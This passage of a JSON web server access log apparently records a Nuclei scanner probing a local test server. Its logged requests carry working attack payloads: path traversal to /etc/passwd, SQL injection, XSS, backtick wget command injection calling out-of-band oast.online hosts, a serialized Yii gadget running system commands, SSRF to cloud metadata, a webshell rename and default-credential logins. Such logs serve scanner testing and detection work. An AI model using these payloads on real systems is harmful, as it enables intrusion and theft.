"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"cmd=login&user=admin&passwd=21232f297a57a5a743894a0e4a801fc3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc9v8gc8smpv8b0ng0t00nzaraxht4qtrr.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/297MFmC1DeCASGGe69hh0X34MW7/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://c9v8gc8smpv8b0ng0t00osuwg3xyxhipx.oast.online\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/supportInstaller HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"MSIE", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc9v8gc8smpv8b0ng0t00ys41ckws1hir3.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.212","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9v8gc8smpv8b0ng0t00fpgeoij5cakbx.oast.online&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/ssh-config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 